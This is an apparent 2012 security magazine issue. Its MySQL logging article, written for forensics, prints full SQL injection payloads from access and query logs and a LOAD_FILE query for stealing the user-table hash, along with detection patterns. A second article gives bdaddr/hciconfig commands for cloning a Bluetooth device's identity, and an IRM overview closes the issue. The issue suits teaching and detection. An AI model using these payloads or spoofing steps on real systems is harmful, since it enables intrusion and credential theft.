CHMAG-Nov2012

Issue34 – Nov2012 | Page-1

Hacking Magazine: Issue 34 – Nov2012

Logging in MySQL

Introduction

This article demonstrates logging techniques in MySQL that let you uncover and analyze mischief, whether by an outside attacker or an insider, focused on specific areas of the database.

What you will learn

This article covers how logging is done in MySQL and where to look for information about the queries executed by every client of the MySQL server.

Pre-requisites

The reader must have a basic working knowledge of MySQL and of the operating system to follow the technical details in this article.

Getting Started

The following types of logs are available in MySQL (the table is reproduced from the MySQL reference manual page listed under References):

Log Type           Info Written to Log
Error log          Problems encountered starting, running, or stopping mysqld
General query log  Established client connections and statements received from clients
Binary log         Statements that change data (also used for replication)
Relay log          Data changes received from a replication master server
Slow query log     Queries that took more than long_query_time seconds to execute

By default, neither the general query log nor the slow query log is enabled in MySQL. Before enabling anything, you can at least see what is executing right now with the following command:

mysql> show processlist;

Note: This lists the current client threads with their user, host and database. The Info column shows the statement each thread is executing at this moment (NULL for an idle connection). It is a live snapshot, not a log: nothing is retained once a statement finishes, so it does not "enable" anything.

Figure 1: processlist Output

The process list only shows what is running at this instant. If you want to see all the queries executed on the server over time, you have to log them first.

We have seen the different types of logging in MySQL, so which one should we use? We will use the general query log, which records every statement the server receives.

How to go about it?

Check whether logging is enabled or not
Check what type of logging is enabled (FILE, TABLE, BOTH)
If it is not enabled, enable it
Decide what to check in the logs

Checking whether logging is enabled or not

Simply log into the MySQL prompt and issue the following command:

mysql> show variables;

This lists all the global variables in MySQL (Figure 2). Look for the general_log variable and its value; if logging is not enabled its value will be "OFF". The general_log_file variable holds the path the general log is (or will be) written to. Its default is <host_name>.log in the data directory, so on the setups used here it was:

For *NIX: "/var/lib/mysql/mysql.log"

For Windows (XAMPP setup): "C:\xampp\mysql\data\<system_name>.log"

What type of logging is enabled (FILE, TABLE, BOTH)?

The general and slow logs can be written to a file, to the tables mysql.general_log and mysql.slow_log, or to both. You can determine which by looking at the value of the following variable in the same output:

log_output = 'FILE|TABLE|BOTH'

You can change the value using the following command:

mysql> SET GLOBAL log_output = 'FILE';

Watch out for a fourth value, NONE: with log_output set to NONE nothing is written even when general_log is ON.

Figure 2: All available variables in MySQL

If logging is not enabled, how to enable it?

As logging is not enabled, let's enable it first. To do that, issue the following commands (SET GLOBAL needs the SUPER privilege, and the log file must be somewhere the mysqld process can write):

mysql> SET GLOBAL general_log = 'ON';
mysql> SET GLOBAL general_log_file = 'path_on_your_system';

Similarly you can turn on the slow query log:

mysql> SET GLOBAL slow_query_log = 'ON';
mysql> SET GLOBAL slow_query_log_file = 'path_on_your_system';

Slow query logs record the que
ries that took longer to execute than the number of seconds set in "long_query_time".

Two caveats before relying on these logs. First, SET GLOBAL takes effect immediately but does not survive a restart of mysqld; put the same settings (general_log, general_log_file, log_output, slow_query_log, long_query_time) in my.cnf or my.ini to make them permanent. Second, the general log records every statement verbatim, which on older servers includes the passwords in SET PASSWORD and GRANT statements, and it grows quickly on a busy server, so restrict the file's permissions and rotate it.

What to check?

So, we have all the required logs. What next? Let's analyze.

What could be wrong?

It could be an attack from the web, the most common being SQL injection.

What about somebody from inside? Privilege escalation or data theft?

In both cases, who did it? Let's find out.

Case 1:

Suppose somebody found a weak link in the application and got into the system through SQL injection. I don't have to explain what SQL injection is, but I can show what someone can do with it.

For the attacker there is only one entry point, the web application, but in the back end several components see the same traffic: the web server, the database server, and so on. Each keeps its own log, so the attack leaves a trace at more than one layer.

Let's look at the web server log (in our case the Apache access log). During normal operations things look simple and straightforward; at a glance the log is neat and clean (Figure 3).

Let's search for something like "select", to see if anyone is trying to run a SQL query through a request parameter (Figure 4). Similarly we can search for "union" or any other SQL keyword to see if any suspicious activity is going on. Remember that parameters appear URL-encoded in the access log ("+" for spaces, "%27" for a quote), so decode the request line before matching, or search for the encoded forms as well.

Figure 3: Apache access log using XpoLog

Figure 4: Filtering log on "select" command

It is interesting to see that we have some requests with SQL queries in the request parameters. Two things mark them as suspicious rather than accidental: the same SQL fragment is repeated with only the probed value changing (database(), user(), version(), @@hostname, @@basedir), and several requests carry the same timestamp, down to the second. A human does not type seven injection strings in one second; it means the attacker ran an automated scanner to exploit the vulnerability. The constant 0x31303235343830303536 and the 0x7e,0x27 delimiters that appear in every payload are a fingerprint of the tool used, and the HTTP 200 responses with varying sizes (54, 42, 47, 39 bytes) suggest the injected values were coming back in the page.

Suspicious log snippet:

127.0.0.1 - - [14/Sep/2012:15:45:10 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

127.0.0.1 - - [14/Sep/2012:15:45:10 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28version%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 39 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28system_user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28%40%40hostname+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28%40%40basedir+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

Figure 5: Filtering log on "union" command
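The triage described above, keyword search plus same-second grouping, as an added Python example that is not part of the original article. The log lines are constructed to mirror the snippet (combined log format, URL-encoded payloads); the keyword list, burst threshold and the marker constant (simply the one recurring in the snippet) are assumptions for the demonstration.

```python
"""Triage an Apache access log for SQL-injection probes.

Added example, not part of the original article. The log lines are constructed
to mirror the snippet above (combined log format, payloads URL-encoded in the
query string); the marker constant is the one that recurs in those payloads.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Combined log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# SQL fragments that have no business in an ordinary request parameter.
SQLI_RE = re.compile(
    r"union\s+(?:all\s+)?select|information_schema|load_file\s*\(|into\s+(?:out|dump)file"
    r"|@@\w+|\b(?:database|version|user|system_user|current_user)\s*\(\s*\)",
    re.IGNORECASE,
)
# Constant appended to every payload in the snippet above; injection tools add
# such markers so they can locate their own output in the response page.
TOOL_MARKER = "0x31303235343830303536"

def decode_hex_literals(s):
    """Replace 0x.. literals of six or more hex digits with their ASCII text
    (when they decode cleanly) so a report shows what the attacker selected."""
    def repl(m):
        try:
            return bytes.fromhex(m.group(1)).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
    return re.sub(r"0x([0-9A-Fa-f]{6,})", repl, s)

def parse_line(line):
    """Parse one combined-log-format line; None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # parse_qsl undoes the %xx escapes and turns '+' back into spaces.
    rec["params"] = parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True)
    return rec

def find_sqli(lines):
    """One finding per request parameter whose decoded value contains SQL."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            hits = SQLI_RE.findall(value)
            if hits:
                findings.append({
                    "host": rec["host"], "time": rec["time"], "param": name,
                    "keywords": [re.sub(r"\s+", " ", h.lower()) for h in hits],
                    "payload": value, "decoded": decode_hex_literals(value),
                })
    return findings

def summarize(findings, burst_threshold=3):
    """Group findings by source and second: several injection requests in the
    same second are the signature of an automated tool, not of a human."""
    per_second = Counter((f["host"], f["time"]) for f in findings)
    bursts = sorted((h, t, n) for (h, t), n in per_second.items() if n >= burst_threshold)
    return {
        "requests_flagged": len(findings),
        "sources": sorted({f["host"] for f in findings}),
        "bursts": bursts,
        "tool_marker_hits": sum(TOOL_MARKER in f["payload"] for f in findings),
        "probed": sorted({k for f in findings for k in f["keywords"]}),
    }

# Constructed sample log with the same shape as the article's snippet.
_UA = '"-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"'
_PROBE = ("/sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28"
          "cast%28{expr}+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x")

def _access(ts, target, status, size, host="127.0.0.1"):
    return f'{host} - - [14/Sep/2012:{ts} +0530] "GET {target} HTTP/1.1" {status} {size} {_UA}'

SAMPLE_LOG = [
    _access("15:44:58", "/sqli.php?u=42", 200, 118),
    _access("15:45:10", "/sqli.php?u=999999.9%27+union+all+select+%28select+concat%280x7e%2C0x27%2C"
            "0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C"
            "0x31303235343830303536+and+%27x%27%3D%27x", 200, 54),
    _access("15:45:10", _PROBE.format(expr="database%28%29"), 200, 42),
    _access("15:46:05", _PROBE.format(expr="user%28%29"), 200, 47),
    _access("15:46:05", _PROBE.format(expr="version%28%29"), 200, 39),
    _access("15:46:05", _PROBE.format(expr="%40%40hostname"), 200, 42),
    _access("15:46:05", _PROBE.format(expr="%40%40basedir"), 200, 47),
    _access("15:47:00", "/index.php", 200, 2048, host="10.0.0.7"),
]

if __name__ == "__main__":
    print(summarize(find_sqli(SAMPLE_LOG)))
```

Run it against a real access log with `find_sqli(open(path))`; the decoded field turns the hex literals back into text, so the first probe's 0x7233... literal reads as the string the tool injected, and the bursts list is where to start the timeline of the incident.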

Once you are sure that there is an incident of SQL injection from a given IP address, preserve the evidence (the original access log with its timestamps, and the general log for the same window) and proceed with the formal procedure of investigating the issue with the cyber cell. The source in the snippet above is 127.0.0.1 only because the attack was run against the author's own lab setup; in a real incident that field is the address you carry into the investigation, bearing in mind that it may be a proxy or a compromised host rather than the attacker's own machine.

Case 2:

Now let's consider the second case, where a MySQL user who already has access to the database does some mischief. Popular activities are:

Running privilege escalation attacks
Getting the root password (we will see how)
Dumping database(s) into files

Note: A few MySQL privilege escalation modules are available in Metasploit as well.

Getting the root password hash is fairly simple. A low-privilege user who happens to hold the FILE privilege (it is not granted by default, but accounts created with ALL PRIVILEGES get it) just has to execute the following query at the prompt:

mysql> SELECT LOAD_FILE('C:\xampp\mysql\data\mysql\user.MYD');

Note: The path will change as per the setup. Backslash is the escape character in MySQL string literals, so on Windows either double the backslashes or use forward slashes in the path. If you are not getting any result, the account lacks FILE, secure_file_priv restricts the directories the server may read from, or the mysqld process cannot read the file; then you would need some other way to the file, such as a shell, ssh or RDP. Basically we just need the data of this file.

user.MYD is the MyISAM data file of the mysql.user table: it holds the MySQL accounts with their host, user name and password hash. So if you are root you can simply run the following query to see all users:

mysql> select Host, User, Password from mysql.user;

Figure 6: Users table in MySQL

When the low-privilege user (fdb in our case) tries to run this query, he will obviously get an access-denied error. This is where our previous query comes in handy, reading the file directly. So what is the problem now? Simply that the password is stored as a hash. Note that it is not MD5: MySQL's native format is SHA1(SHA1(password)), displayed as '*' followed by 40 hex digits (a 16-character value means the pre-4.1 scheme). Either way the hash is unsalted, so cracking a weak password would not take much time.

Note: Tools like John the Ripper and Cain & Abel handle the MySQL hash formats; an MD5-only cracker such as md5crack is of no use here.

Considering the last part, where a user dumps a database into a file for some notorious purpose (SELECT ... INTO OUTFILE from the prompt, or a mysqldump from a shell, which shows up in the general log as one connection that SELECTs every table in turn), we can check for such queries in our general_log or slow_query_log. In this case we open the log file and do some manual analysis first.

Here is a snippet of the general query log. The columns are connection id, command and argument; the server prints a timestamp only when the time changes, and the Connect line tells you which account and host each connection id belongs to:

  325 Connect   root@localhost on
  325 Init DB   forensics
  325 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 3,1),0x31303235343830303536 and 'x'='x'
  325 Quit
  326 Connect   root@localhost on
  326 Init DB   forensics
  326 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 4,1),0x31303235343830303536 and 'x'='x'

  326 Quit
  327 Connect   root@localhost on
  327 Init DB   forensics
  327 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 5,1),0x31303235343830303536 and 'x'='x'
  327 Quit
  328 Connect   root@localhost on
  328 Init DB   forensics
  328 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 6,1),0x31303235343830303536 and 'x'='x'
  328 Quit
  329 Connect   root@localhost on
  329 Init DB   forensics
  329 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 7,1),0x31303235343830303536 and 'x'='x'
  329 Quit
  330 Connect   root@localhost on
  330 Init DB   forensics
  330 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 8,1),0x31303235343830303536 and 'x'='x'
  330 Quit

What we basically search for is statements like "union select", queries against the "information_schema" database, queries against the "mysql" database, LOAD_FILE and INTO OUTFILE, and so on. The log also answers the "who": the Connect line gives the account and host behind each connection id, so every suspicious statement can be tied back to a MySQL user. In the snippet above every injected query runs as root@localhost, evidently the account the web application connects with; that tells us the application was given far more privilege than it needs, and the attacker inherited all of it. Then analyze further to conclude on a result.
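The same search, done over the general log with each hit attributed to the account that issued it, as an added Python example that is not part of the original article. The sample log is constructed in the general log's file format (connection id, command, argument; timestamp only when it changes; statements may continue on following lines), modelled on the snippet above plus an insider session; the account names, paths and rule list are assumptions for the demonstration.

```python
"""Triage a MySQL general query log and attribute statements to accounts.

Added example, not from the original article. The sample log is constructed in
the file format of the general log (connection id, command, argument; the
timestamp is printed only when it changes; multi-line statements continue on
following lines), with entries modelled on the snippet above plus an insider
session; the account names and paths are assumptions for the demonstration.
"""
import re
from collections import Counter

LOG_LINE_RE = re.compile(
    r"^(?:(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2}))?\s*(?P<cid>\d+)\s+"
    r"(?P<cmd>Connect|Init DB|Query|Quit|Prepare|Execute|Close stmt|Field List|Change user)"
    r"(?:\s+(?P<arg>.*))?$"
)

# What to look for, in the order the article lists it, plus the two
# file-related operations from case 2 and the usual privilege changes.
RULES = [
    ("union injection", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    ("schema enumeration", re.compile(r"information_schema", re.I)),
    ("credential access", re.compile(r"mysql\.user\b|load_file\s*\(", re.I)),
    ("file write", re.compile(r"into\s+(?:out|dump)file", re.I)),
    ("privilege change", re.compile(r"\bgrant\b|set\s+password|create\s+user", re.I)),
]

def parse_general_log(lines):
    """Return (cid, cmd, arg) records; a line that does not start a record is
    a continuation of the previous Query and is appended to it."""
    records = []
    for raw in lines:
        line = raw.rstrip()
        if not line:
            continue
        m = LOG_LINE_RE.match(line)
        if m:
            records.append([m.group("cid"), m.group("cmd"), (m.group("arg") or "").strip()])
        elif records and records[-1][1] == "Query":
            records[-1][2] += " " + line.strip()
    return [tuple(r) for r in records]

def triage_general_log(lines):
    """Attribute every suspicious statement to the account that issued it."""
    sessions = {}   # cid -> {"user": "name@host", "db": current database}
    hits = []
    for cid, cmd, arg in parse_general_log(lines):
        if cmd == "Connect":
            # argument is "user@host on" or "user@host on dbname"
            m = re.match(r"(\S+) on(?:\s+(\S+))?", arg)
            sessions[cid] = {"user": m.group(1) if m else arg,
                             "db": m.group(2) if m else None}
        elif cmd == "Init DB":
            sessions.setdefault(cid, {"user": "?", "db": None})["db"] = arg
        elif cmd == "Query":
            reasons = [name for name, rx in RULES if rx.search(arg)]
            if reasons:
                s = sessions.get(cid, {"user": "?", "db": None})
                hits.append({"cid": cid, "user": s["user"], "db": s["db"],
                             "reasons": reasons, "query": arg})
        elif cmd == "Quit":
            sessions.pop(cid, None)
    return hits

def hits_by_account(hits):
    """How many suspicious statements each account issued."""
    return Counter(h["user"] for h in hits)

SAMPLE_GENERAL_LOG = """\
120914 15:46:05     325 Connect   root@localhost on
                    325 Init DB   forensics
                    325 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 3,1),0x31303235343830303536 and 'x'='x'
                    325 Quit
                    326 Connect   app@localhost on forensics
                    326 Query     SELECT * FROM forensics_test where uname = 'alice'
                    326 Quit
120914 16:02:11     340 Connect   fdb@localhost on
                    340 Query     SELECT LOAD_FILE('C:/xampp/mysql/data/mysql/user.MYD')
                    340 Query     select Host, User, Password
from mysql.user
                    340 Query     SELECT * FROM forensics.customers
INTO OUTFILE 'C:/xampp/tmp/dump.csv'
                    340 Quit
""".splitlines()

if __name__ == "__main__":
    for h in triage_general_log(SAMPLE_GENERAL_LOG):
        print(h["cid"], h["user"], h["db"], h["reasons"], h["query"][:70])
    print(hits_by_account(triage_general_log(SAMPLE_GENERAL_LOG)))
```

If log_output is TABLE rather than FILE, the same attribution is simpler still: mysql.general_log already has user_host, thread_id and argument columns, so the RULES patterns can go straight into a WHERE clause instead of a parser.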

Conclusion

Logging alone will not do the job; it is just as important to analyze the logs afterwards. Frequently database administrators only enable the logging features and leave it at that, but the actual analysis behind it is what matters. One thing I perhaps shouldn't be mentioning is that, using this technique, you can capture every query an automated scanner like Havij or SQLMap sends to the server. I personally do not recommend that, but once you know the queries these tools run you will understand SQL injection much better.

References:

http://dev.mysql.com/doc/refman/5.1/en/server-logs.html

Dhiraj Ranka

Dhiraj Ranka has been working as a Senior Security Analyst at NII Consulting, Mumbai, for more than four years. He is additionally involved in intensive research and web application testing, primarily for executing vulnerability assessment projects and delivering training.

Cloning Bluetooth Device

[Note: This demonstration is based on the article "Bluetooth Reconnaissance – Watching over Invisible". Please go through it before moving forward.]

In the previous article we saw how to find devices that are in visible as well as in invisible (non-discoverable) mode using different tools, and we understood the different terms that come up during scanning.

Here we will recall one scan result. The first block gives the Bluetooth addresses, then the clock offset and then the class information. From the class information we can conclude what kind of device we have scanned.

In this section let's play with our own Bluetooth interfaces, so that we can prepare them for attack.

Initial State:

The screenshot above shows the initial configuration of my hci1 external Bluetooth dongle. Look especially at the BD_ADDR, Name and Class fields.

First, and most important, we will change the BD_ADDR of the device:

#bdaddr -i hci1 <new_bd_addr>

As with hci1, we can change the address of as many of our Bluetooth devices as we want. In the screenshot above you can see that the BD_ADDR of both hci0 and hci1 has been changed:

hci0 to AA:AA:AA:AA:AA:AA
hci1 to BB:BB:BB:BB:BB:BB

Rather than changing the address to all A's or all B's, we can clone our device as any other Bluetooth device we can see. First scan the air:

#hcitool scan

Why not pick up the Android phone's BD_ADDR?

#bdaddr -i hci1 <BD_ADDR>

You can cross-check the configuration with:

#hciconfig -a

So now we have successfully changed the BD_ADDR. An interesting point: bdaddr writes the new address into the dongle's non-volatile memory (it only works on chipsets whose firmware it knows, CSR being the common one), so the change survives a reset and a reboot; it does not revert when you unplug the dongle. Keep a note of the original address if you ever want it back.

Now let's change our device name:

#hciconfig hci1 name "android"

You can cross-check again and verify that the name has also changed.

So now, will our Bluetooth device act as a phone? The answer is no. Look at the class field: it is still 0x000000. Let's change its class, which is also how it advertises its services:

#hciconfig hci1 class 0x58020c

Now you can clearly see that we have changed the BD_ADDR, the name and the class of our device as we wished. (0x58020c decodes to major class Phone, minor class Smartphone, with the Telephony, Object Transfer and Capturing service bits set.)

With these settings, when a scan is made from a smartphone, two devices show up: "bt-0" is the default hci0 interface, for which we made no changes, and the device named "android" is nothing but our hci1 dongle, which now looks like an Android smartphone as far as the scanner can tell.

The question is, why make these changes?

Basically, in certain premises where a particular type of Bluetooth device is blocked or not allowed, we can simply turn ourselves into any other type of device with just a few commands. Everything in a scan result is self-reported by the device, so a control that filters on address, name or class cannot trust it to identify what it is really talking to. The above settings also play a very important role in many attacks which we will look at further on.

Again the question is, while making these configuration changes, how do we find which class to move to? A class-of-device generator is available at:

URL: http://bluetooth-pentest.narod.ru/software/bluetooth_class_of_device-service_generator.html

Find the class of any device you want to pick up. As per your need, you can pick any type of device with the services you want, as shown above.
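An offline equivalent of that generator, plus a parser for the inquiry results discussed at the start of the article, as an added Python example that is not part of the original article. It follows the Class of Device layout from the Bluetooth Assigned Numbers (bits 0-1 format type, 2-7 minor device class, 8-12 major device class, 13-23 service class bits); only the major classes and the Computer and Phone minor classes are tabulated, and the hcitool inq output with its addresses is constructed.

```python
"""Bluetooth Class of Device (CoD) encoder/decoder and inquiry-result parser.

Added example, not code from the original article: it does offline what the
class generator linked above does, using the CoD layout from the Bluetooth
Assigned Numbers (bits 0-1 format type, 2-7 minor device class, 8-12 major
device class, 13-23 service class bits). Only the major classes plus the
Computer and Phone minor classes are tabulated; the hcitool inq output is
constructed, with made-up addresses.
"""
import re

MAJOR_CLASSES = {
    0x00: "Miscellaneous", 0x01: "Computer", 0x02: "Phone",
    0x03: "LAN/Network Access Point", 0x04: "Audio/Video", 0x05: "Peripheral",
    0x06: "Imaging", 0x07: "Wearable", 0x08: "Toy", 0x09: "Health",
    0x1F: "Uncategorized",
}
MINOR_CLASSES = {
    "Computer": {0: "Uncategorized", 1: "Desktop workstation", 2: "Server-class computer",
                 3: "Laptop", 4: "Handheld PC/PDA", 5: "Palm-size PC/PDA",
                 6: "Wearable computer"},
    "Phone": {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smartphone",
              4: "Wired modem or voice gateway", 5: "Common ISDN access"},
}
SERVICE_BITS = {
    13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
    18: "Rendering", 19: "Capturing", 20: "Object Transfer", 21: "Audio",
    22: "Telephony", 23: "Information",
}

def decode_cod(cod):
    """Split a 24-bit CoD into major class, minor class and service names."""
    if not 0 <= cod <= 0xFFFFFF:
        raise ValueError("CoD is a 24-bit value")
    if cod & 0x3:
        raise ValueError("only format type 0 is defined")
    major_code = (cod >> 8) & 0x1F
    minor_code = (cod >> 2) & 0x3F
    major = MAJOR_CLASSES.get(major_code, f"Reserved(0x{major_code:02x})")
    minor = MINOR_CLASSES.get(major, {}).get(minor_code, f"0x{minor_code:02x}")
    services = [name for bit, name in sorted(SERVICE_BITS.items()) if cod & (1 << bit)]
    return {"major": major, "minor": minor, "services": services}

def _lookup(table, name):
    for code, label in table.items():
        if label == name:
            return code
    raise ValueError(f"unknown name {name!r}")

def encode_cod(major, minor, services=()):
    """Build the value to pass to `hciconfig <dev> class 0x......`."""
    cod = (_lookup(MAJOR_CLASSES, major) << 8) | (_lookup(MINOR_CLASSES.get(major, {}), minor) << 2)
    for name in services:
        cod |= 1 << _lookup(SERVICE_BITS, name)
    return cod

INQ_RE = re.compile(
    r"^\s*(?P<bdaddr>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+clock offset:\s*(?P<offset>0x[0-9A-Fa-f]+)"
    r"\s+class:\s*(?P<cod>0x[0-9A-Fa-f]+)"
)

def parse_inquiry(text):
    """Parse `hcitool inq` output into address, clock offset and decoded class,
    which is what you need when choosing a device to clone."""
    devices = []
    for line in text.splitlines():
        m = INQ_RE.match(line)
        if m:
            devices.append({"bdaddr": m.group("bdaddr").upper(),
                            "clock_offset": int(m.group("offset"), 16),
                            "class": decode_cod(int(m.group("cod"), 16))})
    return devices

# Constructed inquiry output in hcitool's format; the addresses are made up.
SAMPLE_INQUIRY = """\
Inquiring ...
\t00:11:22:33:44:55\tclock offset: 0x2a33\tclass: 0x5a020c
\tAA:BB:CC:DD:EE:FF\tclock offset: 0x0e7e\tclass: 0x3e010c
"""

if __name__ == "__main__":
    for dev in parse_inquiry(SAMPLE_INQUIRY):
        print(dev["bdaddr"], dev["class"])
    print(hex(encode_cod("Phone", "Smartphone", ["Telephony", "Object Transfer", "Capturing"])))
```

Decoding the article's own value, 0x58020c, gives Phone / Smartphone with Telephony, Object Transfer and Capturing; encoding a Computer / Laptop with no services gives 0x00010c, which is the kind of value you would feed to hciconfig to impersonate a laptop instead.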

References:

1. http://en.wikipedia.org/wiki/Bluetooth
2. http://www.bluetooth.com
3. http://linux.die.net/man/8/hciconfig

Swaroop D. Yermalkar

Swaroop is a final-year engineering student at M.I.T. College of Engineering, Pune. He is an enthusiast and hobbyist in infosec.

Information Rights Management (IRM)

Information Rights Management is the set of techniques and methods that protect the highly sensitive information of an organization irrespective of where the file is located, whether it resides "inside" or "outside" the corporate boundary. This works because the permissions embedded inside the file do not allow unauthorized access, modification, copying or printing. It is typically used to protect financial documents, intellectual property such as patents and design blueprints, and executive communications.

Broadly speaking, IRM addresses the fundamental limitation of Data Loss Prevention (DLP). DLP relies heavily on protecting sensitive files within the corporate network, typically at its end points. It protects data based on its location (directory, file server, database) or while in transit, but does not give protection at a more granular level, i.e. the information contained in the file itself. IRM currently applies mainly to documents and emails in a typical corporate environment.

While DLP is a "transmission control" technology, IRM is a "usage control" technology.

Why do we need IRM?

The rationale for using IRM is that the rights associated with data must travel along with it. Copying the data must not strip the associated rights from the information. Rights to modify, update, restrict or even destroy that information must be retained by the party it pertains to, even when a third party holds the information.

In the larger context, IRM helps organizations enforce corporate policy governing the secure flow of highly sensitive data. File protections are defined and enforced based on the user's identity together with the corporate policy for a given class of data. The best way to protect information is to do it directly at the level of the information, not at the level of the many systems that might change, transport or store it.

What exactly can be achieved with IRM?

Preventing restricted content from unauthorized modification, copying, printing or pasting
Disabling the Print Screen feature in Microsoft Windows for taking snapshots of restricted content

Restricting content exposure wherever it is sent
Supporting file expiration, so that the contents of documents are automatically rendered un-viewable (or viewable) after a set time
Full auditing of both access to documents and changes to the rights/policy by business users

What can't be prevented using IRM?

Sensitive content being erased, stolen, captured or transmitted by malicious programs such as Trojans, key loggers etc. (IRM controls run inside the viewing application on the client, so anything that controls the client machine sits beneath them)
Content being lost or corrupted due to virus infection
Restricted content being hand-copied or retyped from a display screen
An unauthorized person taking a digital photograph of restricted content displayed on a screen
Snapshots of restricted content taken with third-party screen-capture tools

Are Digital Rights Management (DRM) and IRM the same thing?

Not really. Digital Rights Management (DRM) technologies are typically used by hardware manufacturers, publishers, copyright holders and individuals with the intent to limit the use of digital content and devices "after sale". It is specifically targeted at defeating piracy of rich media such as Blu-ray, CDs, DVDs, tapes and records. In the United States a legal mandate, the Digital Millennium Copyright Act (DMCA), imposes criminal penalties on those who make available technologies whose primary purpose is to bypass content protection.

The main focus of DRM is to defeat copyright infringement by putting "digital locks" on rich media (records, CDs, DVDs etc.) in the business-to-customer domain, while IRM restricts itself to sensitive information exchange in the business-to-business domain, such as merger and acquisition plans, design blueprints, patents, financial statements, strategic business plans etc.

Key for IRM's successful implementation

